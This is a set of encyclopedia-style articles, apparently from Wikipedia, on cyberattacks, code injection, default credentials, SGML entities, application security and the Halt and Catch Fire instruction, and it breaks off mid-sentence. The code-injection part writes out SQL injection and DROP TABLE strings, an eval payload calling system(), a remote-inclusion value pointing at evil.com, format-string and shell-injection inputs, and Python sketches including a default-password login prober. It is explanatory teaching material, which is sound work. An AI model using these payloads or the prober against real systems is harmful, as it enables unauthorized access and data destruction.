Perpetrators of a cyberattack can be criminals, hacktivists, or states. They attempt to find weaknesses in a system, exploit them, create malware to carry out their goals, and deliver it to the targeted system. Once installed, the malware can have a variety of effects depending on its purpose. Detection of cyberattacks is often absent or delayed, especially when the malware attempts to spy on the system while remaining undiscovered. If it is discovered, the targeted organization may attempt to collect evidence about the attack, remove malware from its systems, and close the vulnerability that enabled the attack.

Cyberattacks can cause a variety of harms to targeted individuals, organizations, and governments, including significant financial losses and identity theft. They are usually illegal both as a method of crime and warfare, although correctly attributing the attack is difficult and perpetrators are rarely prosecuted.

A cyberattack is any attempt by an individual or organization to use computers or digital systems to steal, alter, expose, disable, or destroy information, or to breach computer systems, networks, or infrastructures.[2] Definitions differ as to the type of compromise required; some, for example, require the system to produce unexpected responses or cause injury or property damage.[3] Some definitions exclude attacks carried out by non-state actors and others require the target to be a state.[4] Keeping a system secure relies on maintaining the CIA triad: confidentiality (no unauthorized access), integrity (no unauthorized modification), and availability.[5] Although availability is less important for some web-based services, it can be the most crucial aspect for industrial systems.[6]

In the first six months of 2017, two billion data records were stolen or impacted by cyber attacks, and ransomware payments reached US$2 billion, double that of 2016.[7] In 2020, with the increase of remote work as an effect of the COVID-19 global pandemic, cybersecurity statistics revealed a huge increase in hacked and breached data.[8] The worldwide information security market was forecast to reach $170.4 billion in 2022.[9]

Over time, computer systems make up an increasing portion of daily life and interactions.
While the increasing complexity and connectedness of the systems increases the efficiency, power, and convenience of computer technology, it also renders the systems more vulnerable to attack and worsens the consequences of an attack, should one occur.[10] Despite developers' goal of delivering a product that works entirely as intended, virtually allsoftwareandhardwarecontains bugs.[11]If a bug creates a security risk, it is called avulnerability.[12][13][14]Patchesare often released to fix identified vulnerabilities, but those that remain unknown (zero days) as well as those that have not been patched are still liable for exploitation.[15]The software vendor is not legally liable for the cost if a vulnerability is used in an attack, which creates an incentive to make cheaper but less secure software.[16]Vulnerabilities vary in their ability to beexploitedby malicious actors. The most valuable allow the attacker toinjectand run their own code (calledmalware), without the user being aware of it.[12]Without a vulnerability enabling access, the attacker cannot gain access to the system.[17] The Vulnerability Model (VM) identifies attack patterns, threats, and valuable assets, which can be physical or intangible. It addresses security concerns like confidentiality, integrity, availability, and accountability within business, application, or infrastructure contexts.[18] A system's architecture and design decisions play a major role in determining how safe it can be.[19]The traditional approach to improving security is the detection of systems vulnerable to attack andhardeningthese systems to make attacks more difficult, but it is only partially effective.[20]Formalrisk assessmentfor compromise of highly complex and interconnected systems is impractical[21]and the related question of how much to spend on security is difficult to answer.[22]Because of the ever changing and uncertain nature of cyber-threats, risk assessment may produce scenarios that are costly or unaffordable to mitigate.[23]As of 2019[update], there are no commercially available, widely usedactive defensesystems for protecting systems by intentionally increasing the complexity or variability of systems to make it harder to attack.[24]Thecyber resilienceapproach, on the other hand, assumes that breaches will occur and focuses on protecting essential functionality even if parts are compromised, using approaches such asmicro-segmentation,zero trust, andbusiness continuity planning.[25] The majority of attacks can be prevented by ensuring all software is fully patched. Nevertheless, fully patched systems are still vulnerable to exploits usingzero-day vulnerabilities.[26]The highest risk of attack occurs just after a vulnerability has been publicly disclosed or a patch is released, because attackers can create exploits faster than a patch can be developed and rolled out.[27] Software solutions aim to prevent unauthorized access and detect the intrusion of malicious software.[28]Training users can avoid cyberattacks (for example, not to click on a suspicious link or email attachment), especially those that depend on user error.[5][29]However, too many rules can cause employees to disregard them, negating any security improvement. 
Some insider attacks can also be prevented using rules and procedures.[29] Technical solutions can prevent many causes of human error that leave data vulnerable to attackers, such as encrypting all sensitive data, preventing employees from using insecure passwords, installing antivirus software to prevent malware, and implementing a robust patching system to ensure that all devices are kept up to date.[30]

There is little evidence about the effectiveness and cost-effectiveness of different cyberattack prevention measures.[28] Although attention to security can reduce the risk of attack, achieving perfect security for a complex system is impossible, and many security measures have unacceptable cost or usability downsides.[31] For example, reducing the complexity and functionality of the system is effective at reducing the attack surface.[32] Disconnecting systems from the internet is one truly effective measure against attacks, but it is rarely feasible.[21] In some jurisdictions, there are legal requirements for protecting against attacks.[33]

The cyber kill chain is the process by which perpetrators carry out cyberattacks.[34] After the malware is installed, its activity varies greatly depending on the attacker's goals.[40] Many attackers try to eavesdrop on a system without affecting it. Although this type of malware can have unexpected side effects, it is often very difficult to detect.[41] Botnets are networks of compromised devices that can be used to send spam or carry out[42] denial-of-service attacks, flooding a system with more requests than it can handle at once and causing it to become unusable.[36] Attackers may also use computers to mine cryptocurrencies, such as Bitcoin, for their own profit.[43]

Ransomware is software used to encrypt or destroy data; attackers demand payment for the restoration of the targeted system. The advent of cryptocurrency enabling anonymous transactions has led to a dramatic increase in ransomware demands.[44]

The stereotype of a hacker is an individual working for themself. However, many cyber threats are teams of well-resourced experts.[45] "Growing revenues for cyber criminals are leading to more and more attacks, increasing professionalism and highly specialized attackers. In addition, unlike other forms of crime, cybercrime can be carried out remotely, and cyber attacks often scale well."[46] Many cyberattacks are caused or enabled by insiders, often employees who bypass security procedures to get their job done more efficiently.[47] Attackers vary widely in their skill and sophistication, as well as in their determination to attack a particular target rather than opportunistically picking an easy one.[47] The skill level of the attacker determines which types of attacks they are prepared to mount.[48] The most sophisticated attackers can persist undetected on a hardened system for an extended period of time.[47]

Motivations and aims also differ.
Depending whether the expected threat is passive espionage, data manipulation, or active hijacking, different mitigation methods may be needed.[41] Software vendors and governments are mainly interested in undisclosed vulnerabilities (zero-days),[49]while organized crime groups are more interested in ready-to-useexploit kitsbased on known vulnerabilities,[50][51]which are much cheaper.[52]The lack of transparency in the market causes problems, such as buyers being unable to guarantee that the zero-day vulnerability was not sold to another party.[53]Both buyers and sellers advertise on thedark weband usecryptocurrencyfor untraceable transactions.[54][55]Because of the difficulty in writing and maintaining software that can attack a wide variety of systems, criminals found they could make more money by renting out their exploits rather than using them directly.[56] Cybercrime as a service, where hackers sell prepacked software that can be used to cause a cyberattack, is increasingly popular as a lower risk and higher profit activity than traditional hacking.[55]A major form of this is to create a botnet of compromised devices and rent or sell it to another cybercriminal. Different botnets are equipped for different tasks such as DDOS attacks or password cracking.[57]It is also possible to buy the software used to create a botnet[58]andbotsthat load the purchaser's malware onto a botnet's devices.[59]DDOS as a service using botnets retained under the control of the seller is also common, and may be the first cybercrime as a service product, and can also be committed bySMS floodingon the cellular network.[60]Malware and ransomware as a service have made it possible for individuals without technical ability to carry out cyberattacks.[61] Targets of cyberattacks range from individuals to corporations and government entities.[10]Many cyberattacks are foiled or unsuccessful, but those that succeed can have devastating consequences.[21]Understanding the negative effects of cyberattacks helps organizations ensure that their prevention strategies are cost-effective.[28]One paper classifies the harm caused by cyberattacks in several domains:[62] Thousands ofdata recordsare stolen from individuals every day.[10]According to a 2020 estimate, 55 percent of data breaches were caused byorganized crime, 10 percent bysystem administrators, 10 percent byend userssuch as customers or employees, and 10 percent by states or state-affiliated actors.[67]Opportunistic criminals may cause data breaches—often usingmalwareorsocial engineering attacks, but they will typically move on if the security is above average. 
More organized criminals have more resources and are more focused in theirtargeting of particular data.[68]Both of them sell the information they obtain for financial gain.[69]Another source of data breaches arepolitically motivated hackers, for exampleAnonymous, that target particular objectives.[70]State-sponsored hackers target either citizens of their country or foreign entities, for such purposes aspolitical repressionandespionage.[71] After a data breach, criminals make money by selling data, such as usernames, passwords,social mediaorcustomer loyaltyaccount information,debitandcredit cardnumbers,[69]and personal health information (seemedical data breach).[72]This information may be used for a variety of purposes, such asspamming, obtaining products with a victim's loyalty or payment information,prescription drug fraud,insurance fraud,[73]and especiallyidentity theft.[43]Consumer losses from a breach are usually a negativeexternalityfor the business.[74] Critical infrastructureis that considered most essential—such as healthcare, water supply, transport, and financial services—which has been increasingly governed bycyber-physical systemsthat depend on network access for their functionality.[75][76]For years, writers have warned of cataclysmic consequences of cyberattacks that have failed to materialize as of 2023[update].[77]These extreme scenarios could still occur, but many experts consider that it is unlikely that challenges in inflicting physical damage or spreading terror can be overcome.[77]Smaller-scale cyberattacks, sometimes resulting in interruption of essential services, regularly occur.[78] There is little empirical evidence of economic harm (such asreputational damage) from breaches except the direct cost[79]for such matters as legal, technical, and public relations recovery efforts.[80]Studies that have attempted to correlate cyberattacks to short-term declines instock priceshave found contradictory results, with some finding modest losses, others finding no effect, and some researchers criticizing these studies on methodological grounds. The effect on stock price may vary depending on the type of attack.[81]Some experts have argued that the evidence suggests there is not enough direct costs or reputational damage from breaches to sufficientlyincentivizetheir prevention.[82][83] Government websites and services are among those affected by cyberattacks.[78]Some experts hypothesize that cyberattacks weaken societal trust or trust in the government, but as of 2023[update]this notion has only limited evidence.[77] Responding quickly to attacks is an effective way to limit the damage. The response is likely to require a wide variety of skills, from technical investigation to legal and public relations.[84]Because of the prevalence of cyberattacks, some companies plan their incident response before any attack is detected, and may designate acomputer emergency response teamto be prepared to handle incidents.[85][86] Many attacks are never detected. Of those that are, the average time to discovery is 197 days.[87]Some systems can detect and flag anomalies that may indicate an attack, using such technology asantivirus,firewall, or anintrusion detection system. 
Once suspicious activity is suspected, investigators look for indicators of attack and indicators of compromise.[88] Discovery is quicker and more likely if the attack targets information availability (for example with a denial-of-service attack) rather than integrity (modifying data) or confidentiality (copying data without changing it).[89] State actors are more likely to keep the attack secret. Sophisticated attacks using valuable exploits are less likely to be detected or announced, as the perpetrator wants to protect the usefulness of the exploit.[89]

Evidence collection is done immediately, prioritizing volatile evidence that is likely to be erased quickly.[90] Gathering data about the breach can facilitate later litigation or criminal prosecution,[91] but only if the data is gathered according to legal standards and the chain of custody is maintained.[92][90]

Containing the affected system is often a high priority after an attack, and may be enacted by shutoff, isolation, use of a sandbox system to find out more about the adversary,[90] patching the vulnerability, and rebuilding.[93] Once the exact way that the system was compromised is identified, there are typically only one or two technical vulnerabilities that need to be addressed in order to contain the breach and prevent it from reoccurring.[94] A penetration test can then verify that the fix is working as expected.[95] If malware is involved, the organization must investigate and close all infiltration and exfiltration vectors, as well as locate and remove all malware from its systems.[96] Containment can compromise investigation, and some tactics (such as shutting down servers) can violate the company's contractual obligations.[97] After the breach is fully contained, the company can then work on restoring all systems to operation.[98] Maintaining a backup and having tested incident response procedures are used to improve recovery.[25]

Attributing a cyberattack is difficult, and of limited interest to companies that are targeted by cyberattacks.
In contrast,secret servicesoften have a compelling interest in finding out whether a state is behind the attack.[99]Unlike attacks carried out in person, determining the entity behind a cyberattack is difficult.[100]A further challenge in attribution of cyberattacks is the possibility of afalse flag attack, where the actual perpetrator makes it appear that someone else caused the attack.[99]Every stage of the attack may leaveartifacts, such as entries in log files, that can be used to help determine the attacker's goals and identity.[101]In the aftermath of an attack, investigators often begin by saving as many artifacts as they can find,[102]and then try to determine the attacker.[103]Law enforcement agencies may investigate cyber incidents[104]although the hackers responsible are rarely caught.[105] Most states agree that cyberattacks are regulated under the laws governing theuse of force in international law,[106]and therefore cyberattacks as a form of warfare are likely to violate the prohibition of aggression.[107]Therefore, they could be prosecuted as acrime of aggression.[108]There is also agreement that cyberattacks are governed byinternational humanitarian law,[106]and if they target civilian infrastructure, they could be prosecuted as awar crime,crime against humanity, or act ofgenocide.[108]International courts cannot enforce these laws without sound attribution of the attack, without which countermeasures by a state are not legal either.[109] In many countries, cyberattacks are prosecutable under various laws aimed atcybercrime.[110]Attribution of the attackbeyond reasonable doubtto the accused is also a major challenge in criminal proceedings.[111]In 2021,United Nations member statesbegan negotiating adraft cybercrime treaty.[112] Many jurisdictions havedata breach notification lawsthat require organizations to notify people whose personal data has been compromised in a cyberattack.[113]
https://en.wikipedia.org/wiki/Attack_(computing)
Code injection is a computer security exploit where a program fails to correctly process external data, such as user input, causing it to interpret the data as executable commands. An attacker using this method "injects" code into the program while it is running. Successful exploitation of a code injection vulnerability can result in data breaches, access to restricted or critical computer systems, and the spread of malware.

Code injection vulnerabilities occur when an application sends untrusted data to an interpreter, which then executes the injected text as code. Injection flaws are often found in services like Structured Query Language (SQL) databases, Extensible Markup Language (XML) parsers, operating system commands, Simple Mail Transfer Protocol (SMTP) headers, and other program arguments. Injection flaws can be identified through source code examination,[1] static analysis, or dynamic testing methods such as fuzzing.[2]

There are numerous types of code injection vulnerabilities, but most are errors in interpretation: they treat benign user input as code or fail to distinguish input from system commands. Many examples of interpretation errors can exist outside of computer science, such as the comedy routine "Who's on First?". Code injection can be used maliciously for many purposes. Code injections that target the Internet of Things could also lead to severe consequences such as data breaches and service disruption.[3]

Code injections can occur on any type of program running with an interpreter. Carrying out such an attack is often trivial, which is one of the primary reasons why server software is kept away from users. A browser's developer tools offer a simple way to observe code injection first-hand. Code injection vulnerabilities are recorded by the National Institute of Standards and Technology (NIST) in the National Vulnerability Database (NVD) as CWE-94. Code injection peaked in 2008 at 5.66% as a percentage of all recorded vulnerabilities.[4]

Code injection may be done with good intentions. For example, changing or tweaking the behavior of a program or system through code injection can cause the system to behave in a certain way without malicious intent.[5][6] Some users may unsuspectingly perform code injection because input they provided to a program was not considered by those who originally developed the system. Another benign use of code injection is the discovery of injection flaws in order to find and fix vulnerabilities; this is known as a penetration test.

To prevent code injection problems, developers can use secure input and output handling strategies, such as validating or sanitizing input and encoding output. These solutions deal primarily with web-based injection of HTML or script code into a server-side application. Other approaches must be taken, however, when dealing with injection of user code on a user-operated machine, which often results in privilege elevation attacks; various techniques exist to detect and isolate both managed and unmanaged code injections.

An SQL injection takes advantage of SQL syntax to inject malicious commands that can read or modify a database or compromise the meaning of the original query.[13]

For example, consider a web page that has two text fields which allow users to enter a username and a password. The code behind the page will generate an SQL query to check the password against the list of user names, along the lines of the sketch below. If this query returns any rows, then access is granted.
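The following is a runnable Python sketch of that pattern, using a hypothetical single-table login database; the table name, columns, and credentials are illustrative only. It contrasts the naive string-concatenated query with a parameterized one, and demonstrates the always-true bypass discussed next.

```python
import sqlite3

# Hypothetical login database for illustration.
db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE users (username TEXT, password TEXT)")
db.execute("INSERT INTO users VALUES ('alice', 's3cret')")

def login_vulnerable(username, password):
    # Building the query by string concatenation lets input become SQL.
    query = ("SELECT * FROM users WHERE username = '" + username +
             "' AND password = '" + password + "'")
    return db.execute(query).fetchall()

def login_safe(username, password):
    # Parameterized queries keep data separate from SQL code.
    return db.execute(
        "SELECT * FROM users WHERE username = ? AND password = ?",
        (username, password)).fetchall()

# The classic bypass: the injected condition '1'='1' is always true.
print(login_vulnerable("alice", "wrong' OR '1'='1"))  # returns alice's row
print(login_safe("alice", "wrong' OR '1'='1"))        # returns []
```

Because the parameterized version never splices user input into the SQL text, the injected quote characters are treated as ordinary data and the login fails as it should.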
However, if a malicious user enters a valid username and injects some valid code, such as ('Password' OR '1'='1'), in the password field, the injected text becomes part of the query's logic. Here "Password" stands for a blank or innocuous string; since '1'='1' is always true, many rows are returned, thereby allowing access. The technique may be refined to allow multiple statements to run, or even to load and run external programs. For instance, if an adversary supplies ';DROP TABLE User; --' as the user ID and 'OR"=' as the password, the resulting query deletes the User table from the database. This occurs because the ; symbol signifies the end of one command and the start of a new one, while -- signifies the start of a comment.

Code injection is the malicious injection or introduction of code into an application. Some web servers have a guestbook script, which accepts small messages from users, typically short greetings. However, a malicious person may know of a code injection vulnerability in the guestbook and enter a message containing script rather than plain text. If another user views the page, then the injected code will be executed. This code can allow the attacker to impersonate another user. However, this same software bug can be accidentally triggered by an unassuming user, which will cause the website to display bad HTML code.

HTML and script injection are popular subjects, commonly termed "cross-site scripting" or "XSS". XSS refers to an injection flaw whereby user input to a web script or something along such lines is placed into the output HTML without being checked for HTML code or scripting. Many of these problems are related to erroneous assumptions about what input data is possible or the effects of special data.[14]

Template engines are often used in modern web applications to display dynamic data. However, trusting non-validated user data can frequently lead to critical vulnerabilities[15] such as server-side template injection. While this vulnerability is similar to cross-site scripting, template injection can be leveraged to execute code on the web server rather than in a visitor's browser. It abuses a common workflow of web applications, which often use user inputs and templates to render a web page: a placeholder such as {{visitor_name}} is replaced with data during the rendering process. An attacker can use this workflow to inject code into the rendering pipeline by providing a malicious visitor_name. Depending on the implementation of the web application, they could choose to inject {{7*'7'}}, which the renderer could resolve to Hello 7777777. Note that the actual web server has evaluated the malicious code and therefore could be vulnerable to remote code execution.

An eval() injection vulnerability occurs when an attacker can control all or part of an input string that is fed into an eval() function call.[16] The argument of "eval" will be processed as PHP, so additional commands can be appended. For example, if "arg" is set to "10; system('/bin/echo uh-oh')", additional code is run which executes a program on the server, in this case "/bin/echo". A sketch of the same pattern follows.
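The flaw just described is shown here as a Python analog, since Python's eval() executes attacker-influenced text the same way; the function name calculate and the payload are illustrative, mirroring the PHP example above.

```python
def calculate(arg):     # 'arg' is meant to be a number, e.g. "10"
    return eval(arg)    # UNSAFE: arg is executed as code

# A benign caller:
print(calculate("10"))  # prints 10

# An attacker supplies code instead of a number, mirroring the
# "10; system('/bin/echo uh-oh')" payload from the PHP example:
print(calculate("__import__('os').system('echo uh-oh') or 10"))

# Safer: parse the expected type instead of evaluating the input.
def calculate_safe(arg):
    return int(arg)     # raises ValueError for anything but a number
```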
PHP allows serialization and deserialization of whole objects. If untrusted input is allowed into the deserialization function, it is possible to overwrite existing classes in the program and execute malicious attacks.[17] Such an attack on Joomla was found in 2013.[18]

PHP's file-inclusion mechanism can be abused in a similar way. Consider a PHP program that includes a file specified by request: the code expects a color to be provided, but an attacker might provide COLOR=http://evil.com/exploit, causing PHP to load and execute the remote file.

Format string bugs appear most commonly when a programmer wishes to print a string containing user-supplied data. The programmer may mistakenly write printf(buffer) instead of printf("%s", buffer). The first version interprets buffer as a format string and parses any formatting instructions it may contain. The second version simply prints a string to the screen, as the programmer intended. Consider a short C program that has a local character array password which holds a password; the program asks the user for an integer and a string, then echoes out the user-provided string. If the user input is filled with a list of format specifiers, such as %s%s%s%s%s%s%s%s, then printf() will start reading from the stack. Eventually, one of the %s format specifiers will access the address of password, which is on the stack, and print the password value to the screen.

Shell injection (or command injection[19][unreliable source?]) is named after UNIX shells but applies to most systems that allow software to programmatically execute a command line. A vulnerable tcsh script that compares its first argument against a constant illustrates the problem: if the script is stored in the executable file ./check, the shell command ./check " 1 ) evil" will attempt to execute the injected shell command evil instead of comparing the argument with the constant one. Here, the code under attack is the code that is trying to check the parameter, the very code that might have been trying to validate the parameter to defend against an attack.[20]

Any function that can be used to compose and run a shell command is a potential vehicle for launching a shell injection attack. Among these are system(), StartProcess(), and System.Diagnostics.Process.Start(). Client-server systems such as web browser interaction with web servers are potentially vulnerable to shell injection. Consider a short PHP program that runs on a web server and calls an external program named funnytext, via the passthru function, to replace a word the user sent with some other word. The passthru function composes a shell command that is then executed by the web server. Since part of the command it composes is taken from the URL provided by the web browser, this allows the URL to inject malicious shell commands. One can inject code into such a program in several ways by exploiting the syntax of various shell features, such as command separators, command substitution, and variable expansion (the possibilities are not exhaustive).[21]

Some languages offer functions to properly escape or quote strings that are used to construct shell commands. However, this still puts the burden on programmers to know or learn about these functions and to remember to make use of them every time they use shell commands. In addition to using these functions, validating or sanitizing the user input is also recommended. A safer alternative is to use APIs that execute external programs directly rather than through a shell, thus preventing the possibility of shell injection. However, these APIs tend not to support various convenience features of shells, and tend to be more cumbersome or verbose compared to concise shell syntax. A sketch contrasting the two styles follows.
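The following Python sketch, assuming a POSIX system where cat exists, illustrates the three options just discussed: composing a shell command from raw input, composing it with an escaping helper, and bypassing the shell entirely.

```python
import shlex
import subprocess

# A value an attacker might supply where a filename was expected.
filename = "notes.txt; echo INJECTED"

# UNSAFE: the command string is handed to a shell, so ';', '|', '$(...)'
# and similar shell syntax inside 'filename' is interpreted as commands.
subprocess.run("cat " + filename, shell=True)          # runs "echo INJECTED"

# Escaping helper: shlex.quote() wraps the value so the shell sees data.
subprocess.run("cat " + shlex.quote(filename), shell=True)

# Safer still: no shell at all; the argument list is passed directly to
# the program, so shell metacharacters have no special meaning.
subprocess.run(["cat", filename])
```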
https://en.wikipedia.org/wiki/Code_injection
Where a device needs ausernameand/orpasswordto log in, adefault passwordis usually provided to access the device during its initial setup, or after resetting tofactory defaults. Manufacturers of such equipment typically use a simple password, such asadminorpasswordon all equipment they ship, expecting users to change the password duringconfiguration. The default username and password are usually found in the instruction manual (common for all devices) or on the device itself.[citation needed] Default passwords are one of the major contributing factors to large-scale compromises ofhome routers.[1]Leaving such a password on devices available to the public is a major security risk.[2][3][4][5]There are several Proof-of-Concept (POC), as well as real world worms running across internet, which are configured to search for systems set with a default username and password. Voyager Alpha Force,Zotob, and MySpooler are a few examples of POC malware which scan theInternetfor specific devices and try to log in using the default credentials.[6] In the real world, many forms of malware, such asMirai, have used this vulnerability. Once devices have been compromised by exploiting the Default Credential vulnerability, they can themselves be used for various harmful purposes, such as carrying outDistributed Denial of Service(DDoS) attacks. In one particular incident, a hacker was able to gain access and control of a large number of networks including those ofUniversity of Maryland, Baltimore County, Imagination, Capital Market Strategies L, by leveraging the fact that they were using the default credentials for their NetGear switch.[7] Some devices (such aswireless routers) will have unique default router usernames and passwords printed on a sticker, which is more secure than a common default password. Some vendors will however derive the password from the device'sMAC addressusing a known algorithm, in which case the password can also be easily reproduced by attackers.[8]
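A minimal sketch of the kind of scan such worms perform is shown below, assuming a device that uses HTTP Basic authentication; the address (a TEST-NET documentation address) and the credential list are hypothetical, and such probing should only ever be run against equipment you own.

```python
import urllib.request
from urllib.error import HTTPError, URLError

# Hypothetical device address and a tiny sample of vendor defaults;
# real default-credential lists are far longer.
DEVICE_URL = "http://192.0.2.1/"
DEFAULTS = [("admin", "admin"), ("admin", "password"), ("root", "root")]

def try_default_logins(url, candidates):
    """Report which default username/password pairs a device accepts."""
    for username, password in candidates:
        manager = urllib.request.HTTPPasswordMgrWithDefaultRealm()
        manager.add_password(None, url, username, password)
        opener = urllib.request.build_opener(
            urllib.request.HTTPBasicAuthHandler(manager))
        try:
            opener.open(url, timeout=5)
            print(f"ACCEPTED: {username}/{password} - change this password!")
        except HTTPError:          # e.g. 401: credentials rejected
            pass
        except URLError as err:    # host unreachable, timeout, etc.
            print(f"Could not reach device: {err}")
            return

try_default_logins(DEVICE_URL, DEFAULTS)
```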
https://en.wikipedia.org/wiki/Default_Credential_vulnerability
In the Standard Generalized Markup Language (SGML), an entity is a primitive data type, which associates a string with either a unique alias (such as a user-specified name) or an SGML reserved word (such as #DEFAULT). Entities are foundational to the organizational structure and definition of SGML documents. The SGML specification defines numerous entity types, which are distinguished by keyword qualifiers and context. An entity string value may variously consist of plain text, SGML tags, and/or references to previously defined entities. Certain entity types may also invoke external documents. Entities are called by reference.

Entities are classified as general or parameter, and are further classified as parsed or unparsed.

An internal entity has a value that is either a literal string, or a parsed string comprising markup and entities defined in the same document (such as a Document Type Declaration or subdocument). In contrast, an external entity has a declaration that invokes an external document, thereby necessitating the intervention of an entity manager to resolve the external document reference. An entity declaration may have a literal value, or may have some combination of an optional SYSTEM identifier, which allows SGML parsers to process an entity's string referent as a resource identifier, and an optional PUBLIC identifier, which identifies the entity independent of any particular representation. In XML, a subset of SGML, an entity declaration may not have a PUBLIC identifier without a SYSTEM identifier.

When an external entity references a complete SGML document, it is known in the calling document as an SGML document entity. An SGML document is a text document with SGML markup defined in an SGML prologue (i.e., the DTD and subdocuments). A complete SGML document comprises not only the document instance itself, but also the prologue and, optionally, the SGML declaration (which defines the document's markup syntax and declares the character encoding).[1]

An entity is defined via an entity declaration in a document's document type definition (DTD); a sketch of typical declarations appears at the end of this section. Names for entities must follow the rules for SGML names, and there are limitations on where entities can be referenced. Parameter entities are referenced by placing the entity name between % and ;. Parsed general entities are referenced by placing the entity name between & and ;. Unparsed entities are referenced by placing the entity name in the value of an attribute declared as type ENTITY.

When a document containing entity references is parsed, it is reported to the downstream application as if each reference had been replaced by its value; for instance, a reference to an external entity whose hello.txt referent contains the text Salutations is reported as that text. A reference to an undeclared entity is an error unless a default entity has been defined. Additional markup constructs and processor options may affect whether and how entities are processed; for example, a processor may optionally ignore external entities.

Standard entity sets for SGML and some of its derivatives have been developed as mnemonic devices, to ease document authoring when there is a need to use characters that are not easily typed or that are not widely supported by legacy character encodings. Each such entity consists of just one character from the Universal Character Set. Although any character can be referenced using a numeric character reference, a character entity reference allows characters to be referenced by name instead of code point.
For example, HTML 4 has 252 built-in character entities that do not need to be explicitly declared, while XML has five. XHTML has the same five as XML, but if its DTDs are explicitly used, then it has 253 (&apos; being the extra entity beyond those in HTML 4).
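For instance, an illustrative fragment (the element names here are invented): the accented character in "Café" can be written with an HTML 4 named entity or, in any XML document, with a numeric character reference, while XML itself predefines only five names:

  <!-- named reference (HTML 4) versus numeric reference (any XML) -->
  <p>Caf&eacute; and Caf&#233; are reported identically.</p>
  <!-- the five entities predefined by XML: amp, lt, gt, apos, quot -->
  <p>&lt;tag&gt; &amp; &quot;quoted&quot; &apos;text&apos;</p>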
https://en.wikipedia.org/wiki/SGML_entity
Application security (often shortened to AppSec) includes all tasks that introduce a secure software development life cycle to development teams. Its final goal is to improve security practices and, through that, to find, fix, and preferably prevent security issues within applications. It encompasses the whole application life cycle, from requirements analysis and design through implementation, verification, and maintenance.[1]

Web application security is a branch of information security that deals specifically with the security of websites, web applications, and web services. At a high level, web application security draws on the principles of application security but applies them specifically to the internet and web systems.[2][3] Application security also concentrates on mobile apps and their security, including iOS and Android applications.

Web application security tools are specialized tools for working with HTTP traffic, e.g., web application firewalls. Different approaches will find different subsets of the security vulnerabilities lurking in an application and are most effective at different times in the software lifecycle. They each represent different tradeoffs of time, effort, cost, and vulnerabilities found.

The Open Worldwide Application Security Project (OWASP) provides free and open resources. It is led by a non-profit called The OWASP Foundation. The OWASP Top 10 - 2017 results from recent research based on comprehensive data compiled from over 40 partner organizations. This data revealed approximately 2.3 million vulnerabilities across over 50,000 applications.[4] According to the OWASP Top 10 - 2021, the ten most critical web application security risks include broken access control, cryptographic failures, injection, insecure design, security misconfiguration, vulnerable and outdated components, identification and authentication failures, software and data integrity failures, security logging and monitoring failures, and server-side request forgery.[5]

The OWASP Top 10 Proactive Controls 2024 is a companion list of security techniques that every software architect and developer should know and heed.

Security testing techniques scour for vulnerabilities or security holes in applications. These vulnerabilities leave applications open to exploitation. Ideally, security testing is implemented throughout the entire software development life cycle (SDLC) so that vulnerabilities may be addressed in a timely and thorough manner. There are many kinds of automated tools for identifying vulnerabilities in applications; common categories include static application security testing (SAST), dynamic application security testing (DAST), interactive application security testing (IAST), and software composition analysis (SCA).
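As a minimal sketch of the defense against the injection risk listed above, the following C fragment uses SQLite's C API; the table and column names are hypothetical. Binding the user-supplied value, instead of concatenating it into the SQL text, keeps attacker-controlled input from being parsed as SQL:

  #include <sqlite3.h>

  /* Returns 1 if a user row matches `name`, 0 if not, -1 on error. */
  int user_exists(sqlite3 *db, const char *name) {
      sqlite3_stmt *stmt;
      int found = 0;
      /* UNSAFE alternative: building the SQL with sprintf("...'%s'", name)
         would let input like  x' OR '1'='1  change the query's meaning. */
      if (sqlite3_prepare_v2(db, "SELECT 1 FROM users WHERE name = ?1;",
                             -1, &stmt, NULL) != SQLITE_OK)
          return -1;                              /* prepare failed */
      sqlite3_bind_text(stmt, 1, name, -1, SQLITE_TRANSIENT);
      if (sqlite3_step(stmt) == SQLITE_ROW)
          found = 1;                              /* a row matched */
      sqlite3_finalize(stmt);
      return found;
  }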
https://en.wikipedia.org/wiki/Web_application_security
In computer engineering, Halt and Catch Fire, known by the assembly language mnemonic HCF, is an idiom referring to a computer machine code instruction that causes the computer's central processing unit (CPU) to cease meaningful operation, typically requiring a restart of the computer. It originally referred to a fictitious instruction in IBM System/360 computers (introduced in 1964), making a joke about its numerous non-obvious instruction mnemonics.

With the advent of the MC6800 (introduced in 1974), a design flaw was discovered by programmers. Due to incomplete opcode decoding, two illegal opcodes, 0x9D and 0xDD, will cause the program counter on the processor to increment endlessly, which locks the processor until reset. Those codes have been unofficially named HCF. During the design process of the MC6802, engineers originally planned to remove this instruction, but kept it as-is for testing purposes. As a result, HCF was officially recognized as a real instruction.[1][2] Later, HCF became a humorous catch-all term for instructions that may freeze a processor, including intentional instructions for testing purposes, and unintentional illegal instructions. Some are considered hardware defects, and if the system is shared, a malicious user can execute them to launch a denial-of-service attack.

In the case of real instructions, the implication of this expression is that, whereas in most cases in which a CPU executes an unintended instruction (a bug in the code) the computer may still be able to recover, in the case of an HCF instruction there is, by definition, no way for the system to recover without a restart. The expression catch fire is a facetious exaggeration of the speed with which the CPU chip would be switching some bus circuits, purportedly causing them to overheat and burn.[3]

The Z1 (1938) and Z3 (1941) computers built by Konrad Zuse contained illegal sequences of instructions which damaged the hardware if executed by accident.[4] Apocryphal stories connect this term with an illegal opcode in IBM System/360. A processor, upon encountering the instruction, would start switching bus lines very fast, potentially leading to overheating.[5][6]

In a computer's assembly language, mnemonics are used that are directly equivalent to machine code instructions. The mnemonics are frequently three letters long, such as ADD, CMP (to compare two numbers), and JMP (jump to a different location in the program). The HCF instruction was originally a fictitious assembly language instruction, said to be under development at IBM for use in their System/360 computers, along with many other amusing three-letter acronyms like XPR (Execute Programmer) and CAI (Corrupt Accounting Information), and similar to other joke mnemonics such as "SDI" for "Self Destruct Immediately"[7] and "CRN" for "Convert to Roman Numerals".[8] A list of such mnemonics, including HCF, shows up as "Overextended Mnemonics" in the April 1980 Creative Computing flip-side parody issue.[9]

CPU designers sometimes incorporate one or more undocumented machine code instructions for testing purposes, such as the IBM System/360 DIAGnose instruction.[10]

The Motorola 6800 microprocessor was the first for which an undocumented assembly mnemonic HCF became widely known.
The operation codes (opcodes, the portions of the machine language instructions that specify an operation to be performed) hexadecimal 9D and DD were reported and given the unofficial mnemonic HCF in a December 1977 article by Gerry Wheeler in BYTE magazine on undocumented opcodes.[11] Wheeler noted that Motorola reported 197 valid operation codes for the M6800 processor, and so inferred that, with 256 possible 8-bit combinations, there must be 59 invalid instructions. He described the HCF as a "big surprise", and said of the Catch Fire portion of the moniker, "Well, almost":

